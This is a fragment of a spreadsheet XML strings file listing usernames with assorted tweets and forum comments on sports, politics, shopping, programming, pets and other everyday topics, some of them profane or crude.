  <si>
    <t>VersaryTV</t>
  </si>
  <si>
    <t>@SarrahVerse Reply to my texts maybe</t>
  </si>
  <si>
    <t>ju90artist</t>
  </si>
  <si>
    <t>Oh dear. Blood pressure still sky high now I’ve stopped work for lunch, &amp; most of shopping including lunch ingredients still on doorstep thanks to @Tesco, whose bagless shopping system is clearly never going to work for disabled people like me. What is wrong with re-usable bags?</t>
  </si>
  <si>
    <t>sherrydacosta</t>
  </si>
  <si>
    <t>Something about Felicia George just radiates positive energy and I know she smell like shea butter and pink lotion 😭 #RhythmAndFlow</t>
  </si>
  <si>
    <t>GabelDale</t>
  </si>
  <si>
    <t>@3YearLetterman @Alyssa_Milano Oh, and I am no long the 5th string receiver. I identify as the starting QB</t>
  </si>
  <si>
    <t>_notenoughcloth</t>
  </si>
  <si>
    <t>@shahh The end</t>
  </si>
  <si>
    <t>Fuljhadii</t>
  </si>
  <si>
    <t>@twiteshwarr @KismiBar @VanDiablo Photo hai from the function 🥰</t>
  </si>
  <si>
    <t>_UrsTrulyBaby</t>
  </si>
  <si>
    <t>Keep your eyes peeled for a bargain, and keep your ears perked... More for Virgo https://t.co/YBpIZYoHIy</t>
  </si>
  <si>
    <t>cara_atl</t>
  </si>
  <si>
    <t>@paieliham Please don’t let them go to that photographer again.</t>
  </si>
  <si>
    <t>Zozoe333</t>
  </si>
  <si>
    <t>If I say delete or unfollow..anything if the sort an you don’t listen 👂... start to fade ..</t>
  </si>
  <si>
    <t>JumboElliott76</t>
  </si>
  <si>
    <t>@gregory_clay @CNBC 88''- 95' then to Jets. 96' - 2002</t>
  </si>
  <si>
    <t>quasipsuedomoto</t>
  </si>
  <si>
    <t>@tedlieu @SecPompeo @realDonaldTrump @StateDept only if the WB is legit! and not comped by your Liddle buddy AS!</t>
  </si>
  <si>
    <t>jamestingray</t>
  </si>
  <si>
    <t>I think this says a lot. England players said beforehand they had agreed go all walk off. In the heat of battle, they found they could not. The instinct of fight not flight was too strong. https://t.co/CAkaUvDQ0X</t>
  </si>
  <si>
    <t>BostonGlobe</t>
  </si>
  <si>
    <t>Mass. public schools violated law by denying Catholic, Jewish schools aid for special education, US officials say https://t.co/69R6FVBwGC</t>
  </si>
  <si>
    <t>Beckhamb0y</t>
  </si>
  <si>
    <t>I only have one league where I’m 0-4 this year and it’s the one I have the most money in smh</t>
  </si>
  <si>
    <t>KVetter87</t>
  </si>
  <si>
    <t>@Knottyorchid12 @kenjeong I’m with you on the Johnny Depp as Fox! Glad I wasn’t the only one, and we haven’t even seen the clues or anything.</t>
  </si>
  <si>
    <t>Academia0001</t>
  </si>
  <si>
    <t>Looking to pay someone to write your essay, research paper, and assignment? We are the leading experts in those, Kindly DM us the information. We help ace academic grades!! Hustle less -&gt; Good grades #paypaper #payassignment #payessay #payresearchpaper #onlineclass #essaypay</t>
  </si>
  <si>
    <t>JordanWolff11</t>
  </si>
  <si>
    <t>MIH: Quinnipiac will look to avenge its 4-2 defeat to Maine on Alumni Saturday at 7 p.m. Expect this game to be chippy, as both teams combined for 10 penalties. Stay tuned for updates from myself and the @QUChronicle EIC @bryan_murphy10 throughout the matchup. #ECACHockey</t>
  </si>
  <si>
    <t>celebritycamm</t>
  </si>
  <si>
    <t>I’m hit listenin to this summer walker &amp; it’s a oc combo😭</t>
  </si>
  <si>
    <t>FavorsNikki</t>
  </si>
  <si>
    <t>@CoachLLeong Amen! Prayers for your baby girl! ❤</t>
  </si>
  <si>
    <t>TruMethods</t>
  </si>
  <si>
    <t>Download your copy of the comprehensive #vCIO training manual and learn everything you need to know about creating an effective vCIO process. https://t.co/AoQqIU8pIa</t>
  </si>
  <si>
    <t>AutryLaura</t>
  </si>
  <si>
    <t>@TelfotoABZ761 Monday comes to fast and Friday comes too slow 🤣🤣</t>
  </si>
  <si>
    <t>ThomONeil1</t>
  </si>
  <si>
    <t>@tammdawg @ldog562 @FrankCGilbert @HollyHuntley3 @BonJS0370 @shashatheitch22 @kneadinghands @FistedByJack @therealfeenxc @GDThor1 @GangstaMimi @Catastrophany @bettypge69 @EveScottGarner @Jessie09JZO @BlueTsuni @KimTruthMatters @BJSquirrel @Beleafer1 @Mish_version2 @doug_in_nc @poppij @RonniLaurie @MarciaBunney @kristyshl @zazzybritches @alidupont @yolalindayola @StaryStaryNlght @MynameisMok @GreatTammie @politiolyc @Welshsprout @TomMooshegian @TaggartRehnn @unbrokeMs1 @Beantowndougish @BarryVictor5 @alenesmiles @dancindoti @VCSParent @kaslina @MuldrowDennis @impinkestgirl @Michael_Fisher_ @bluehazeyco @oprman @wildweezle @OklahomaPatrio1 @Tori_K_M You got your account back! She was referring to your secondary account.</t>
  </si>
  <si>
    <t>GameTimeCT</t>
  </si>
  <si>
    <t>Bogan (5 TDs), Davis (2 pick-sixes) spark Sheehan past Branford, to first 4-0 start under Ferrazzi #cthsfb https://t.co/chm0eGI494</t>
  </si>
  <si>
    <t>GSR2R</t>
  </si>
  <si>
    <t>Research from the CIPD shows that, overall, the UK job market is as secure as it was two decades ago - https://t.co/lunPCrY9O8</t>
  </si>
  <si>
    <t>forgive_luv</t>
  </si>
  <si>
    <t>@TheViewFromLL2 Jesus, to use President this is planned! Erick Prince gets to use is private armies to make millions! Sounds nefarious! https://t.co/XKuDr0qx6j</t>
  </si>
  <si>
    <t>MarkCrompton</t>
  </si>
  <si>
    <t>Breakfast with wbanix lauren.s._x &amp; rogerhclarkson 😍 @ The 50s American Diner TM https://t.co/Ki2loNoJkA</t>
  </si>
  <si>
    <t>AlaMode4884</t>
  </si>
  <si>
    <t>@Georgegabrielx Are they getting the rest of their team back from injury? That's the only way I think I'm buying in at this point and I own Cantwell already (missing all his good games)</t>
  </si>
  <si>
    <t>Baseballvic42</t>
  </si>
  <si>
    <t>The #SFGiants have called the Astros for permission to speak to Joe Espada, who is also a candidate for Cubs managing job. SF has a nice list of mostly younger guys.</t>
  </si>
  <si>
    <t>GoogleExpertUK</t>
  </si>
  <si>
    <t>@MaryjaneFurniss @BarbaraRich_law @davidjamessmit5 @drugs oh wonderful, you can all sell your souls together the truth will out "Tell the truth and shame the devil!" x</t>
  </si>
  <si>
    <t>andrew_leach</t>
  </si>
  <si>
    <t>@asifintoronto @n0ght @ElizabethMay Really? Perhaps you didn't pay much attention to his back and forth on China? Or flips on climate?</t>
  </si>
  <si>
    <t>TheDailyNSFW</t>
  </si>
  <si>
    <t>This is my favorite body type: 1) Pretty face 2) All natural 3) Wide hips (big butt) I swear the bush has nothing to do with it 😂 (From L to R; Anikka Eve, Keisha Grey, Dani Daniels, Lily Love) https://t.co/lze8Weyo7K</t>
  </si>
  <si>
    <t>hauley</t>
  </si>
  <si>
    <t>Israel Adesanya: 'Once the Nigerians pull up ... it’s gonna be over for a lot of years in the MMA world' https://t.co/nmvVec9vdy</t>
  </si>
  <si>
    <t>jmm701</t>
  </si>
  <si>
    <t>@usatodayDC More fake news. When will this stop. We voted for him and don't support impeachment for doing his job.</t>
  </si>
  <si>
    <t>R_W_Gronewold</t>
  </si>
  <si>
    <t>@NetflixAndPhil_ If it makes your day seem better by comparison, I just had to load heavy bales of hay with a bad back in below zero wind chill and sleet.</t>
  </si>
  <si>
    <t>homedesignLA</t>
  </si>
  <si>
    <t>@BlazeTV @RepMarkMeadows @realDonaldTrump Remember Rand Paul’s not so ‘secret’ trip to Russia last year to hand deliver a letter for Trump 🐷👃🏻 https://t.co/JxfRQSQKd7</t>
  </si>
  <si>
    <t>ArrahmanCet</t>
  </si>
  <si>
    <t>Please take your Young people to the Event — We Muslim must work with everyone in the community to influence others doing good~ That’s the Legacy of Our Prophet PBUH and our Deen. #StopKnife #StopCrime #Slough… https://t.co/v2fStRYQCw</t>
  </si>
  <si>
    <t>JanetMafGalea</t>
  </si>
  <si>
    <t>@SoCalValleyGal @no_silenced We actually used to live in "the Valley." LOL</t>
  </si>
  <si>
    <t>LucySeymour12</t>
  </si>
  <si>
    <t>@DarknGrim1 Yeah defo original so people don't think it's the same etc ... it's gonna be great</t>
  </si>
  <si>
    <t>_michmash_</t>
  </si>
  <si>
    <t>As a member of the #BeyHive I present to you my favourite ⁦@Beyonce⁩ Songs 🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝🐝 https://t.co/nK5lyUBsDx</t>
  </si>
  <si>
    <t>Awritesinger</t>
  </si>
  <si>
    <t>@normant23 @clemmiegirlnz @briancebuhl @Inkandmagic @Lin_Lustig @RRValeAuthor @FelicityStarke @darthchair @Amberfyre @ElsieMarblewood @AuthorJVinson @contentbyjoy @heylindseys @Brian_C_Palmer @ShannonFerretti @GallifreyGamgee @katrinatputnam @dltauthor @RobertBHayek @JamesNealWrites @aipsnovel @PWilliamsAuthor @laurcunn @WIP_IrisG @erintiffanygrey @HaikuHare @sasathebutcher @MaeBaumWriter @martinfreznell @ShannonKJMurphy @TheCleftonTwain @jessmondywrites @Ned_the_zombie @LachlanJWatt @canuckclick @KayAyDrew @jm_steger @AE_Escence @mishilen @KJWhiteReads @CHendersonBauer @AHKennedy1 @writingsilly @MikeMorrisonRVA @AuthorJ_Elle @Moss_Whelan @April_M_Woodard @reba_adler Well you did an excellent job! I'm happy to see you around again and writing :)</t>
  </si>
  <si>
    <t>phinamin</t>
  </si>
  <si>
    <t>@littlemommascr1 My source of validation and love will shift from primarily being on them to myself. I think self love is so important and vital when it comes to accepting who you are no matter what.</t>
  </si>
  <si>
    <t>NewsfeedsMedia</t>
  </si>
  <si>
    <t>Lufthansa passenger watches his luggage get left behind on flight from Munich to Manchester https://t.co/pg7lzo9eq2</t>
  </si>
  <si>
    <t>asxalerts</t>
  </si>
  <si>
    <t>$CDM Cadence Capital NTA and Top 20 Positions – September 2019 Net Tangible Assets as at Amount Pre Tax NTA* $0.895 Post Tax NTA* $1.048 Share price * $0.810 *Before the 2.0 c fully fra.. https://t.co/IIPP2husDz</t>
  </si>
  <si>
    <t>sarky_sheena</t>
  </si>
  <si>
    <t>@itsproducerdave That’s if you stand outside, wear them wet, then go to someone else’s house who has their heating on.</t>
  </si>
  <si>
    <t>ludwigder14te</t>
  </si>
  <si>
    <t>@realDonaldTrump 1929 ? #34 and #35 were both REPUBLICANS. Better go back to school and learn some history, you dumb, fake caricature of a president https://t.co/dLISRcY3cd</t>
  </si>
  <si>
    <t>Barwickipedia</t>
  </si>
  <si>
    <t>Time to stop seeing the bad in everything and work more towards the good... ...like how this is loss is clearly good for Man City as it allows them to focus on the Champions League. 😂</t>
  </si>
  <si>
    <t>ACrossHammer</t>
  </si>
  <si>
    <t>@nottco Sounds like a fun Sunday in store for you then Wayne eh 👍😂😂😂😂</t>
  </si>
  <si>
    <t>WetHog</t>
  </si>
  <si>
    <t>@Skinsweekly I’d vote for him</t>
  </si>
  <si>
    <t>ElliottFleming9</t>
  </si>
  <si>
    <t>Watching ShadyShiba LIVE: "[17+] Waiting for CoD MW". #caffeinetv @ShadyShiba https://t.co/ZiuctzWUji</t>
  </si>
  <si>
    <t>msladykat59</t>
  </si>
  <si>
    <t>Love the dress . ❤ Love Burgundy https://t.co/TDfs3l7UIR</t>
  </si>
  <si>
    <t>giaannellaa</t>
  </si>
  <si>
    <t>Ok my tweet worked y’all are being too nice to me on this selfie 🥺</t>
  </si>
  <si>
    <t>KayTheModel__</t>
  </si>
  <si>
    <t>Not even going to ask “ why “ or “ how “ because I deserve this blessing.</t>
  </si>
  <si>
    <t>daddydemogorgon</t>
  </si>
  <si>
    <t>@marshfilms Lol I blocked them and unfollowed everyone who followed them 🤡🤡</t>
  </si>
  <si>
    <t>pcnews365</t>
  </si>
  <si>
    <t>Leaks reveal Surface Pro 7, Surface Laptop 3, and Surface on ARM images before Microsoft event https://t.co/whnUdshjac https://t.co/wkOVRh7fix</t>
  </si>
  <si>
    <t>aegeller</t>
  </si>
  <si>
    <t>@Chastitellez I love this! Thanks for tweeting/sharing it.</t>
  </si>
  <si>
    <t>megolas1</t>
  </si>
  <si>
    <t>@JoeAmericaTurbo @TarikNiazi There are no morals left in the GOP.</t>
  </si>
  <si>
    <t>laurasaurusrex</t>
  </si>
  <si>
    <t>@KevinSenzaki @JasperTalemaker Hey I saw you cast the Senzaki summoning circle, nice work!</t>
  </si>
  <si>
    <t>KsotlmBvv500</t>
  </si>
  <si>
    <t>Cash for Cars Melbourne – Sell My Car – Buy My Car – Old Car Buyer, second hand cars au. https://t.co/H1O9ugeRA2 https://t.co/8F1PwbbNFx</t>
  </si>
  <si>
    <t>ashotof_tx</t>
  </si>
  <si>
    <t>Yes I am a Trump supporter, and No I don’t hate you because you aren’t. We can disagree and still be civil. People need to remember that. https://t.co/bEkyhcxmXA</t>
  </si>
  <si>
    <t>pastelwife</t>
  </si>
  <si>
    <t>i’m really struggling and i’m scared i have melanoma bc my doctor said i might and i need a biopsy and my insurance keeps throwing me around. i can’t be seen till the end of october and i have to pay out of pocket and i just wanna cry. 😞</t>
  </si>
  <si>
    <t>Baloowiththebr1</t>
  </si>
  <si>
    <t>@petfinance .y pawrents saw me on the local news. But I think ppl should follow shelters on social media. So many adoptable pets who need furever homes💙</t>
  </si>
  <si>
    <t>StuckMarlo</t>
  </si>
  <si>
    <t>@LakeiyaHall_ You know the vibes🤞🏾. I Love you woman</t>
  </si>
  <si>
    <t>AlecChops</t>
  </si>
  <si>
    <t>@peter4buckley He’s an actual idiot. A real, one, like. They’re pretty rare, but James is 100% DNA rated, pure cell idiot. Fair play to him. The idiot.</t>
  </si>
  <si>
    <t>Now Playing: Milos - Nights in White Satin off of the album "Sound of Silence" on Jazz90.1 @901jazz</t>
  </si>
  <si>
    <t>henslowkey</t>
  </si>
  <si>
    <t>Take her to Dior, 'cause she a freak yo</t>
  </si>
  <si>
    <t>plurwillsher2</t>
  </si>
  <si>
    <t>@SecretBrokenMsg Yup normal shit pot stirers than don't lick the spoon</t>
  </si>
  <si>
    <t>nxwestmidlands</t>
  </si>
  <si>
    <t>@eadenroxy If you have found persistent issues with this particular service, please provide further information here: https://t.co/UV6t8YL0Fh and our Customer Relations Team shall investigate.</t>
  </si>
  <si>
    <t>brookeaspinall_</t>
  </si>
  <si>
    <t>If I was to tell someone about the last week of my life I actually don’t think they’d believe me ahahaha what is going on I can’t keep up</t>
  </si>
  <si>
    <t>tmj_kan_writing</t>
  </si>
  <si>
    <t>This job might be a great fit for you: Industrial Maintenance Project Manager - https://t.co/YUEHv3U32Z #KansasCity, MO #Electrician</t>
  </si>
  <si>
    <t>pdeblassieiii</t>
  </si>
  <si>
    <t>♨️ #Romance #Horror and the #Goddess ❤️ https://t.co/s3kpBFQFGP #iartg #bookboost #ian1 #occult #WolfPackAuthors https://t.co/URS9Xjv8Dr</t>
  </si>
  <si>
    <t>WalterOnstad</t>
  </si>
  <si>
    <t>@tpk_writes @TulsiGabbard @HillaryClinton lol toe the party line huh? Worked real good for Dems back in 2016 too. Good luck 😄</t>
  </si>
  <si>
    <t>Mac_Styli</t>
  </si>
  <si>
    <t>@standbyme44 @mysilentbravery @MSB_Bravehearts @BlizzardBeaches @Scotia_27 @blammogirl44 @SherriMaxwell12 @Tamiwagner18 @kenyattp @Cheryll07973730 @_nancyturner @SweetDar69 @DottieHardin @Marirosa221 @jadziaskyemusic Thank you lovely Joyce! Big hugs to you and the Munchkins!</t>
  </si>
  <si>
    <t>dianecedra</t>
  </si>
  <si>
    <t>Probably a bit too excited to get my question published in @IainDale weekly newsletter!</t>
  </si>
  <si>
    <t>p8rachel</t>
  </si>
  <si>
    <t>This is now an out of context Pride and Prejudice account sorry for the interruption</t>
  </si>
  <si>
    <t>theFAKEJeremyG</t>
  </si>
  <si>
    <t>I need more people in my life who like to watch baseball. I just want to drink a beer at a bar and yell things while watching the Astros</t>
  </si>
  <si>
    <t>allisonjrhodes</t>
  </si>
  <si>
    <t>It’s good my social life ended when I graduated college because when I get home from work, I literally do not want to see another human being for the rest of the night.</t>
  </si>
  <si>
    <t>CookTomBlock</t>
  </si>
  <si>
    <t>@MarkYusko With or without trade deal, global economies have major problems, that don’t match up with valuations. Trade is a small part of picture overall.</t>
  </si>
  <si>
    <t>DontForgetDana</t>
  </si>
  <si>
    <t>I just wanna talk to you but I can’t 😒</t>
  </si>
  <si>
    <t>P2Jeff</t>
  </si>
  <si>
    <t>@realDonaldTrump ...says Trump, who’s longest read in the last 20 years is a Wendy’s menu. Who takes reading advice from an illiterate fool?🤔</t>
  </si>
  <si>
    <t>nabihahmakeup</t>
  </si>
  <si>
    <t>🃏Why so serious?🃏 This look had to be done after the release of the new #JokerFilm 😈 Products: @plouiseacademy Base 0 | @beautybay @MMMMITCHELL New palette | @mehronmakeup Coagulated blood | @hudabeauty Cheerleader liquid matte💚 Look inspo: @Gabxxrielle #halloweenmakeup https://t.co/1KFpaflaPk</t>
  </si>
  <si>
    <t>crypt0charts</t>
  </si>
  <si>
    <t>@bitdegree_learn @bitdegree_org You motherf**ers are the biggest scam in the space. Stole 30 MILLION DOLLARS of the people who invested in your crap. Suck my d**k. You motherf**ers. Can’t imagine how you p**sys sleep when you’ve stolen millions and millions dollars of ours!!</t>
  </si>
  <si>
    <t>SolarPhinn</t>
  </si>
  <si>
    <t>@OhNoSheTwitnt I am ashamed to admit that I'm wired to make a judgement call about what I perceive a person's gender to be and then use "he/him" or "she/her". I am working hard to undo that wiring. I have made mistakes. It's not easy to overcome what has been automatic for 40+ years. I try.</t>
  </si>
  <si>
    <t>cogecohelps</t>
  </si>
  <si>
    <t>@budswillbeatya Hi there, You can reach our technicians online using this link: https://t.co/0g42E7EJA4 I hope this helps you get the help you require. Thanks, Brandon Cogeco</t>
  </si>
  <si>
    <t>Chris89445588</t>
  </si>
  <si>
    <t>@johnsweeneyroar @BBCPanorama You finally got the Sack! You slimey toad! @BBC obviously didn't feel you represented them after you got caught out. They wanted to distance themselves. October looks to be a good month with you f*cking off and Brexit 🥳🥳🥳🥳🥳</t>
  </si>
  <si>
    <t>destroyah3034</t>
  </si>
  <si>
    <t>@ABC7 Right on schedule. Prices barely start to stabilize, and boom some disaster hits a refinery.</t>
  </si>
  <si>
    <t>MargaretNovack</t>
  </si>
  <si>
    <t>@ewarren If this is her Twitter, why does she refer to herself in the 3rd person?</t>
  </si>
  <si>
    <t>Techgnostik</t>
  </si>
  <si>
    <t>@ATX_fight_club I don't read it as wishing you ill. It's snarky, but he was just saying there are consequences to buying a non-Tesla EV that you just don't have with a Tesla.</t>
  </si>
  <si>
    <t>SimplyParis4701</t>
  </si>
  <si>
    <t>This is true forgiveness and a show of the power and love of Christ through a person! https://t.co/1s4V59iA6u</t>
  </si>
  <si>
    <t>feldhaus_jacob</t>
  </si>
  <si>
    <t>We get it Trevor, you put a 20$ exhaust system on your Pontiac sunfire so you can annoy the fuck out of people and get 158 horsepower instead of 157</t>
  </si>
  <si>
    <t>tara_thomp</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: NWOT blouse / top size medium coral. https://t.co/8TDWhb54PA via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>TonyDWHW</t>
  </si>
  <si>
    <t>Took some NyQuil, I'm passing the hell out. See ya tomorrow Twitterverse! 💜</t>
  </si>
  <si>
    <t>OxboroughJimmy</t>
  </si>
  <si>
    <t>@Claire30525154 @melissax1125 And thank goodness there’s no title match just champions vs Champions including the 5 on 5 elimination match both the men’s and women’s</t>
  </si>
  <si>
    <t>gomezphoto</t>
  </si>
  <si>
    <t>@HillaryClinton I’m sure it is still hard for you to keep up with Bill and your own lies.</t>
  </si>
  <si>
    <t>MoonRavenMagic</t>
  </si>
  <si>
    <t>"It is harder to develop your occult or psychic body when you are dead because all planes meet in the physical." Frederick Lenz</t>
  </si>
  <si>
    <t>discodescartes</t>
  </si>
  <si>
    <t>Ways to piss me off as a band or musician: - give yourself a name that’s a pain to Google; - don’t release your music physically; - come to the UK and play one show in London. On a weeknight. Oh, bonus 4th: - have a website that causes my MacBook to crash 🙄</t>
  </si>
  <si>
    <t>LeahRaeGetts</t>
  </si>
  <si>
    <t>earn To Tap Into The #HighestPayingApp For Your #Pics! --&gt; https://t.co/dApMZKb7fx https://t.co/rrIArxskG4</t>
  </si>
  <si>
    <t>thehighendhub</t>
  </si>
  <si>
    <t>How the luxury travel sector embraced cryptocurrency https://t.co/UmoslWAK50 https://t.co/95PCMMqshr</t>
  </si>
  <si>
    <t>mayhue96</t>
  </si>
  <si>
    <t>@jeremynewberger Don’t overlook the fact, that with heel spurs, he wouldn’t have been able to pull off half those moves.</t>
  </si>
  <si>
    <t>channah_ranck</t>
  </si>
  <si>
    <t>@realMikeLindell Did Mike ever give out the $1000 he said he would? Never saw him post he gave it away.</t>
  </si>
  <si>
    <t>bob_conley</t>
  </si>
  <si>
    <t>Lol I’m one and done</t>
  </si>
  <si>
    <t>SSpringsPatch</t>
  </si>
  <si>
    <t>Heritage Sandy Springs Museum, Park Executive Director To Retire https://t.co/WHqK5yz0yk</t>
  </si>
  <si>
    <t>OfcTurnerClass</t>
  </si>
  <si>
    <t>@Callen_Corrie We almost won that one! We just needed a new team and 12 more quarters!</t>
  </si>
  <si>
    <t>ianstuartbride</t>
  </si>
  <si>
    <t>Ian Stuart Dress of the Week! Style: Soutache Find and contact your local Ian Stuart boutique on our website https://t.co/JOs7EaaOfF #ianstuart #ianstuartbride #ianstuartlondon #2020wedding #dressoftheweek https://t.co/DYTwRJL8pO</t>
  </si>
  <si>
    <t>Noslata</t>
  </si>
  <si>
    <t>@Sassywagi @shaunking @0rf @BernieSanders @etadis You see how CNN and MSNBC continue to smear and campaign against him yet he maintains a solid 2nd position</t>
  </si>
  <si>
    <t>GreenlawSherry</t>
  </si>
  <si>
    <t>Listen to the video and listen to it very carefully</t>
  </si>
  <si>
    <t>ZeraiyaYoko</t>
  </si>
  <si>
    <t>A man telling me to shut up in an argument will result in that being the last convo I’ll have with that boy.</t>
  </si>
  <si>
    <t>FORUMS</t>
  </si>
  <si>
    <t>DarweeniePlays</t>
  </si>
  <si>
    <t>US</t>
  </si>
  <si>
    <t>I'd rather the Opposite</t>
  </si>
  <si>
    <t>sparrow61</t>
  </si>
  <si>
    <t>CA</t>
  </si>
  <si>
    <t>Excerpt: This is about my 5th Epson Printer to date. I still have my last one but I am a crafter, so quite a heavy user. I purchased the Eco tank so I could compare the overall cost of inks between the two. So far, I am impressed.</t>
  </si>
  <si>
    <t>kwhali</t>
  </si>
  <si>
    <t>&gt; Responses from folks who have used Rust in practice I remember getting one of my first Rust programs working nicely but all as one big long function. Then I was like right, time to tidy this up into smaller functions and structs before I continue with this any further. I thought that since it works fine as is, this wasn't going to be a difficult refactor, like any other language that I've done such. Hello borrow checker, *99 errors at compile, 99 errors at compile, you fix them all, then compile, 99 errors at compile*. Legit experience, so many borrow issues cropped up once I broke all that logic out, I'd fix them, and to my surprise it only revealed that there were more issues somehow. At one point... it's "WTF just bloody compile and let me run the damn code, enough of your whining damn it!", while at the same time it's also "Wow, I'm really bad at avoiding bugs, I love you borrow checker (and other assorted compile time errors)", especially with those niche cases that get picked up during compile that you'd only otherwise be aware of during run-time and only if you noticed something was actually off. So it can be a hassle and slow me down, but I like the additional confidence when it compiles happily, I feel that I don't need to offload a bunch of checks in a test suite for ensuring a similar amount of trust(not that tests aren't still useful, if anything the overall value of what remains is higher). --- Did I pass the question? **TL;DR:** [My reaction to the question](https://www.youtube.com/watch?v=umDr0mPuyQc). While also being [like this](https://www.youtube.com/watch?v=_7FD_xGLyBs) afterwards.</t>
  </si>
  <si>
    <t>24601Romero</t>
  </si>
  <si>
    <t>Hey folks, Anthem just hit EA Access so I've downloaded it on a whim. I know Anthem took a slating at release but have subsequent patches/updates helped since? Am I going to be uninstalling this in a hurry? Cheers.</t>
  </si>
  <si>
    <t>Surelock01</t>
  </si>
  <si>
    <t>Do you think that's because he's got no balls or because the military's got too much influence?</t>
  </si>
  <si>
    <t>pairolegal</t>
  </si>
  <si>
    <t>Following the example of Michele Bachmann and her lovely husband Marcus “PegMeBaby” Bachmann.</t>
  </si>
  <si>
    <t>plumboy82</t>
  </si>
  <si>
    <t>My cat likes to lay between my hands. There is enough space between me and the keyboard on the table.</t>
  </si>
  <si>
    <t>WayMoreThanTheTip</t>
  </si>
  <si>
    <t>I love Adam and I have a lot of respect for his contributions to the Colts over the years. After these last two games, it’s time to retire or at least go to reserve status.</t>
  </si>
  <si>
    <t>Fakeplastiq</t>
  </si>
  <si>
    <t>&gt; At that rate we will be pursuing a more experienced engineer with less demands at such an inexperienced level. I wouldn't want to work for someone with such poor writing skills. I don't mean to be elitist, but there is a high correlation between writing ability and intelligence. They basically wrote a sentence that said the same thing forwards and backwards (not to mention the lack of punctuation.) If this person thinks that is a decent way to communicate you can be assured there would be communication issues in the future. Those communication breakdowns are always blamed down the hierarchy. From that one sentence I can tell this is a person who thinks they are incredibly smart but couldn't be more wrong. As the old saying goes: there is nothing worse than being condescended to by your inferiors.</t>
  </si>
  <si>
    <t>SunGregMoon</t>
  </si>
  <si>
    <t>We've had three kinds. Cayuga, Peking and Mallards. Cayugas can fly, dont like too, smart good at camoflauge and evading predators. Gorgeous color too black with a green aura. Peking was the dumbest and loudest. Mallards were chill in groups of 3 or less people shy but ironically very social. One drake even played with our dog. For a good year or so they would "roost" at our pond at night after dropping in (literally) and saying hi. It was very neat recognizing their call and them answering to my voice.. good times. -duck poop -stray/wild dogs Btw - Males (drakes) dont quack and some Cayugas have a softer quack.</t>
  </si>
  <si>
    <t>blithe-after-death</t>
  </si>
  <si>
    <t>Sherwood Ross - YO YO YO UFO! [Folk Punk] - I made this in honor of the festive activities at Area 51 today (Saturday here in India).</t>
  </si>
  <si>
    <t>LADYBIRD_HILL</t>
  </si>
  <si>
    <t>I think you're reading into it too much</t>
  </si>
  <si>
    <t>cyberintel13</t>
  </si>
  <si>
    <t>It sounds like what you want is a used server. These can be surprisingly cheap. I would go search ebay and craigslist for used servers like the Dell T310 since it is a Tower not rack mounted. You should be able to find one for less than $200 and it will have the all performance you need.</t>
  </si>
  <si>
    <t>kurenai86</t>
  </si>
  <si>
    <t>Giving the Eagles indigenous players lots of space doesn't seem to be a working plan.</t>
  </si>
  <si>
    <t>Rspies</t>
  </si>
  <si>
    <t>It would be fucking hilarious. And anything that gets Bully Ray and Delirious to stop booking major wrestling shows is a plus.</t>
  </si>
  <si>
    <t>Freezer2609</t>
  </si>
  <si>
    <t>I’ve had cold energy coming up when meditating on a concrete floor. At first I wanted to stop meditating but then decided to surrender. The cold made its way up to my heart and crack opened a wound from my father that I carried within the back side of my heart chakra. Probably unrelated to your experience, but before that experience I was always “afraid” of getting cold and preferred warmth way more.</t>
  </si>
  <si>
    <t>Cajete</t>
  </si>
  <si>
    <t>When you're mad because someone is mad because you asked if they were mad.</t>
  </si>
  <si>
    <t>DarkRogue_YT</t>
  </si>
  <si>
    <t>I hope that creative stays. I have a island that I really like, it’s a aim map hat you can’t build on, to help you with your aim, and to use natural cover for if you don’t have mags in a real match. I built it halfway into season 8 and I keep updating it.</t>
  </si>
  <si>
    <t>Psalm88</t>
  </si>
  <si>
    <t>That's what happened to me EVERYTIME! That's why I'm waiting until my next af due to do the test. How many dpo are you now?</t>
  </si>
  <si>
    <t>MortgageWizard</t>
  </si>
  <si>
    <t>You could hire a property manager that sets up the lease but not sure about leaving your name off of it. If someone wants your info bad enough they can get it.</t>
  </si>
  <si>
    <t>DuMbAsS_SuPrEmE_04</t>
  </si>
  <si>
    <t>Alter probability boom all superpowers right there</t>
  </si>
  <si>
    <t>AutoModerator</t>
  </si>
  <si>
    <t>It seems like you are looking for orchid help today. This group is full of beginners and experts who are happy to help but please do check out [this link for quick Phalaenopsis care](http://www.aos.org/orchids/culture-sheets/novice-phalaenopsis.aspx) in the meanwhile. We also have an /r/orchids WIKI the admins and other volunteers are updating behind the scenes with care information and will soon make it available to the group. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/orchids) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>tubagroova2</t>
  </si>
  <si>
    <t>GB</t>
  </si>
  <si>
    <t>Be interesting how this specs up with a Pi4 for a PC experience around £100</t>
  </si>
  <si>
    <t>Emann B.</t>
  </si>
  <si>
    <t>Admittedly I have not seen any videos of Greta and am only aware of her via the recent headlines, but if grown ass men (including some on CYT) feel the need to openly malign and mock a 16 year old girl, she must be sayin' somethin' to get their tiny balls all up in a twist. Now which one of you little men is gonna get on the dance floor and tap for me?</t>
  </si>
  <si>
    <t>noahsurvived</t>
  </si>
  <si>
    <t>You say "fundamentalism" as if it was a bad thing...lol ***Let God be true and every man a liar.*** Romans 3:4</t>
  </si>
  <si>
    <t>larreas</t>
  </si>
  <si>
    <t>The tweet: In another life, i surely was theeeereeeeeee</t>
  </si>
  <si>
    <t>dillon_wingull</t>
  </si>
  <si>
    <t>These memes I always mistake for ads.</t>
  </si>
  <si>
    <t>Xerleo</t>
  </si>
  <si>
    <t>Not saying "thank you" when someone holds the door for you.</t>
  </si>
  <si>
    <t>TheAvalon29thousand</t>
  </si>
  <si>
    <t>Awesome! itd be cool if they gave him a WS stye buff to go with it</t>
  </si>
  <si>
    <t>BigMooingCow</t>
  </si>
  <si>
    <t>The USAF variant cannot take off vertically. Unless you mean pulling into a vertical climb after takeoff. Which is cool to witness, but they're not going to do that. :)</t>
  </si>
  <si>
    <t>R____I____G____H___T</t>
  </si>
  <si>
    <t>What's wrong with IBM?</t>
  </si>
  <si>
    <t>ruffian2205</t>
  </si>
  <si>
